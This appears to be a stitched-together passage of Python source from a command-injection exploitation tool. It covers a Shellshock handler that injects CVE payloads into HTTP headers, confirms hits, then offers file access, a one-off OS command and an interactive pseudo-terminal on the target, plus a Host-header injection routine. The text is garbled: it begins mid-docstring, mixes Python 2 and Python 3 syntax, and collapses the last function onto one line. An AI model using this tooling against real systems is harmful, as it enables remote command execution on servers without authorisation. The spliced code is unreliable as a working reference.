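  """Turn a URLError into the short message shown to the operator.

  ``str(reason)`` for a socket error looks like "[Errno 111] Connection
  refused"; the first two words are dropped to keep only the description.
  When the reason has no errno prefix (e.g. "timed out") that slice used to
  be empty and the operator saw a bare "." — fall back to the whole reason.
  """
  reason = str(err_msg.reason)
  words = reason.split(" ")[2:]
  text = ' '.join(words) if words else reason
  return text + "."


def get_request_response(request):
  """Send ``request`` through the configured transport and return the response.

  The transport is picked from the options: HTTP proxy, Tor, or a direct
  ``urlopen``.  Error handling, common to all three:

  * HTTP 500 (settings.INTERNAL_SERVER_ERROR) yields ``False`` silently.
  * Any other HTTP status is reported once unless it equals
    ``--ignore-code`` or errors are already being ignored; the operator then
    decides whether to continue (see _continue_or_exit).  Every HTTPError
    case returns ``False``.
  * A URLError (DNS failure, refused connection, timeout) is fatal: the
    reason is printed and SystemExit is raised.

  Only the direct path replaces the urlopen() result with the return value
  of headers.check_http_traffic(request).  NOTE(review): if that helper
  re-sends the request, the target receives the payload twice on the direct
  path — confirm against headers.py.

  Returns the response object, or ``False`` on an HTTP error.
  Raises SystemExit when the operator declines to continue or the host is
  unreachable.
  """
  if settings.REVERSE_TCP == False and settings.BIND_TCP == False:
    headers.check_http_traffic(request)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except _urllib.error.HTTPError as err_msg:
      if _should_report(err_msg):
        _blank_lines_before_error()
        print(settings.print_critical_msg(str(err_msg) + "."))
        _continue_or_exit(err_msg)
      response = False
    except _urllib.error.URLError as err_msg:
      # On Python 3 URLError.reason is usually an OSError, not a str, so the
      # substring test must run on its text form or it raises TypeError.
      if "Connection refused" in str(err_msg.reason):
        text = "The target host is not responding. "
        text += "Please ensure that is up and try again."
      else:
        text = _url_error_text(err_msg)
      _blank_lines_before_error()
      print(settings.print_critical_msg(text))
      raise SystemExit()
  # Check if defined Tor.
  elif menu.options.tor:
    try:
      response = tor.use_tor(request)
    except _urllib.error.HTTPError as err_msg:
      if _should_report(err_msg):
        _blank_lines_before_error()
        print(settings.print_critical_msg(str(err_msg) + "."))
        _continue_or_exit(err_msg)
      response = False
    except _urllib.error.URLError as err_msg:
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(_url_error_text(err_msg)))
      raise SystemExit()
  else:
    try:
      response = _urllib.request.urlopen(request)
    except _urllib.error.HTTPError as err_msg:
      if _should_report(err_msg):
        if settings.VERBOSITY_LEVEL < 2:
          # "\r" overwrites the in-place progress line; the padding clears
          # whatever was left of it.
          print("\r" + settings.print_critical_msg(str(err_msg) + ".") + 30 * " ")
        _continue_or_exit(err_msg)
      response = False
    except _urllib.error.URLError as err_msg:
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(_url_error_text(err_msg)))
      raise SystemExit()
    else:
      response = headers.check_http_traffic(request)
  return response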
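def _ask_again(question_msg):
  """Ask a [Y/n] question on stdin and return True for yes, False for no.

  Batch mode (``--batch``) and an empty answer both count as yes; a quit
  answer raises SystemExit; anything else prints an error and asks again.
  """
  while True:
    if not menu.options.batch:
      sys.stdout.write(settings.print_question_msg(question_msg))
      answer = sys.stdin.readline().replace("\n", "").lower()
    else:
      answer = ""
    if len(answer) == 0:
      answer = "y"
    if answer in settings.CHOICE_YES:
      return True
    elif answer in settings.CHOICE_NO:
      return False
    elif answer in settings.CHOICE_QUIT:
      raise SystemExit()
    else:
      err_msg = "'" + answer + "' is not a valid answer."
      print settings.print_error_msg(err_msg)


def _send_shellshock_probe(request):
  """Send one probe through the configured transport (proxy, Tor or direct).

  Returns the response object, or None when the server answered with an
  HTTP error status: a 500 is ignored silently (as before), any other
  status is reported and the operator is asked via checks.continue_tests
  whether to keep probing — "no" raises SystemExit, "yes" sets
  settings.IGNORE_ERR_MSG so later errors stay quiet.  Previously the
  try/except sat around the whole probe loop, so even a "yes" ended the
  scan; now the caller simply skips the failed (cve, header) pair.
  URLErrors (unreachable host) are not handled here and propagate.
  """
  try:
    if menu.options.proxy:
      return proxy.use_proxy(request)
    if menu.options.tor:
      return tor.use_tor(request)
    return urllib2.urlopen(request)
  except urllib2.HTTPError, err_msg:
    if str(err_msg.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      if checks.continue_tests(err_msg) == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
    return None


def _shellshock_marker_present(response, cve):
  """True when the CVE marker echoed by the payload shows up in the response.

  The marker is looked for among the response header names first (``cve in
  response.info()``), then in the body.  The body is read exactly once: the
  previous code called response.read() twice, and the second call returned
  an empty string, so body-based detection could never fire.
  """
  info = response.info()
  if len(info) > 0 and cve in info:
    return True
  body = response.read()
  return len(body) > 0 and cve in body


def _os_shell_loop(url, cve, check_header, filename, technique, http_request_method, no_result):
  """Run the interactive pseudo-terminal until the operator backs out.

  Each line typed at the prompt is either a shell option (handled by
  checks.check_os_shell_options / check_options) or a command executed on
  the target through cmd_exec, whose output is written to the log file and
  echoed.  Returns when the operator goes back or when an unexpected error
  aborts the shell; KeyboardInterrupt, SystemExit and EOFError propagate.
  """
  go_back = False
  go_back_again = False
  while True:
    try:
      if not readline_error:
        # Tab completer
        readline.set_completer(menu.tab_completer)
        # MacOSX tab completer
        if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
          readline.parse_and_bind("bind ^I rl_complete")
        # Unix tab completer
        else:
          readline.parse_and_bind("tab: complete")
      cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
      cmd = checks.escaped_cmd(cmd)
      if cmd.lower() in settings.SHELL_OPTIONS:
        os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
        go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
        if go_back:
          return
      else:
        shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
        if shell != "":
          # Update logs with executed cmds and execution results.
          logs.executed_command(filename, cmd, shell)
          print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
        else:
          info_msg = "Executing the '" + cmd + "' command... "
          if settings.VERBOSITY_LEVEL >= 1:
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
          err_msg = "The '" + cmd + "' command, does not return any output."
          print settings.print_critical_msg(err_msg) + "\n"
    except (KeyboardInterrupt, SystemExit):
      raise
    except EOFError:
      err_msg = "Exiting, due to EOFError."
      print settings.print_error_msg(err_msg)
      raise
    except Exception:
      # Any other failure inside the shell: redraw the "Testing ..." line
      # and leave the shell (the bare except this replaces behaved the same).
      info_msg = "Testing the " + technique + "... "
      if settings.VERBOSITY_LEVEL > 1:
        info_msg = info_msg + "\n"
      sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
      return


def shellshock_handler(url, http_request_method, filename):
  """Probe every Shellshock CVE against every candidate HTTP header.

  For each (cve, header) pair a payload that echoes "<cve>:Done;" is sent
  in that header through the configured transport.  The target is reported
  as vulnerable when the CVE marker comes back as a response header name or
  in the body.  On a hit the finding is logged, enumeration and file-access
  options run (re-asking when they already ran), and then either
  ``--os-cmd`` is executed once or the interactive pseudo-terminal is
  offered.  ``--batch`` answers every question with yes.

  Args:
    url: target URL.
    http_request_method: HTTP method string, recorded in the log.
    filename: log file path passed to the logs helpers.

  Returns False / True when the operator declines the shell and
  checks.next_attack_vector says not to move on (False if nothing was found
  yet), otherwise None when the probe loop ends.  Raises SystemExit on a
  quit answer, after ``--os-cmd`` has run, or when the operator refuses to
  continue past a non-500 HTTP error.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + "... "
  if settings.VERBOSITY_LEVEL > 1:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print settings.print_info_msg(info_msg)
          print settings.print_payload(payload)
        header = {check_header: payload}
        request = urllib2.Request(url, None, header)
        # Keep the recorded User-Agent in sync with what is actually sent.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        response = _send_shellshock_probe(request)
        if response is None:
          # HTTP error already reported (or silenced); try the next pair.
          continue
        # Inspect the response BEFORE choosing the progress label: the
        # previous code printed "FAILED" at 100% without looking at the last
        # probe's response, so a hit on the final (cve, header) pair was lost.
        detected = _shellshock_marker_present(response, cve)
        if detected:
          no_result = False
        float_percent = "{0:.1f}".format(round(((i * 100) / (total * 1.0)), 2))
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
        elif detected:
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
        else:
          percent = str(float_percent) + "%"
        if not settings.VERBOSITY_LEVEL >= 1:
          info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        if no_result == True:
          continue
        # A hit: switch to the exploitation phase.
        settings.DETECTION_PHASE = False
        settings.EXPLOITATION_PHASE = True
        # Print the findings to log file.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        vuln_parameter = "HTTP Header"
        the_type = " " + vuln_parameter
        check_header = " " + check_header
        vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
        check_header = check_header[1:]
        logs.update_payload(filename, counter, payload)
        if settings.VERBOSITY_LEVEL >= 1:
          checks.total_of_requests()
        success_msg = "The (" + check_header + ") '"
        success_msg += url + Style.RESET_ALL + Style.BRIGHT
        success_msg += "' seems vulnerable via " + technique + "."
        if settings.VERBOSITY_LEVEL <= 1:
          print ""
        print settings.print_success_msg(success_msg)
        print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
        # Enumeration options.
        if settings.ENUMERATION_DONE == True:
          if settings.VERBOSITY_LEVEL >= 1:
            print ""
          if _ask_again("Do you want to enumerate again? [Y/n] > "):
            enumeration(url, cve, check_header, filename)
        else:
          enumeration(url, cve, check_header, filename)
        # File access options.
        if settings.FILE_ACCESS_DONE == True:
          if _ask_again("Do you want to access files again? [Y/n] > "):
            file_access(url, cve, check_header, filename)
        else:
          file_access(url, cve, check_header, filename)
        if menu.options.os_cmd:
          cmd = menu.options.os_cmd
          shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
          print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
          raise SystemExit()
        # Pseudo-Terminal shell
        print ""
        go_back = False
        while True:
          if not menu.options.batch:
            question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
            sys.stdout.write(settings.print_question_msg(question_msg))
            gotshell = sys.stdin.readline().replace("\n", "").lower()
          else:
            gotshell = ""
          if len(gotshell) == 0:
            gotshell = "y"
          if gotshell in settings.CHOICE_YES:
            if not menu.options.batch:
              print ""
            print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
            if readline_error:
              checks.no_readline_module()
            _os_shell_loop(url, cve, check_header, filename, technique, http_request_method, no_result)
            break
          elif gotshell in settings.CHOICE_NO:
            if checks.next_attack_vector(technique, go_back) == True:
              break
            if no_result == True:
              return False
            return True
          elif gotshell in settings.CHOICE_QUIT:
            raise SystemExit()
          else:
            err_msg = "'" + gotshell + "' is not a valid answer."
            print settings.print_error_msg(err_msg)
            continue
    if no_result and settings.VERBOSITY_LEVEL < 2:
      print ""
  except urllib2.HTTPError, err_msg:
    # Reached only from the exploitation helpers (enumeration, file access,
    # cmd_exec); probe errors are handled per request in _send_shellshock_probe.
    if str(err_msg.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()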
def host_injection(url, vuln_parameter, payload): payload = urlparse(url).netloc + payload def inject_host(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('Host', payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None #response = inject_host(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy}) response = inject_host(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit()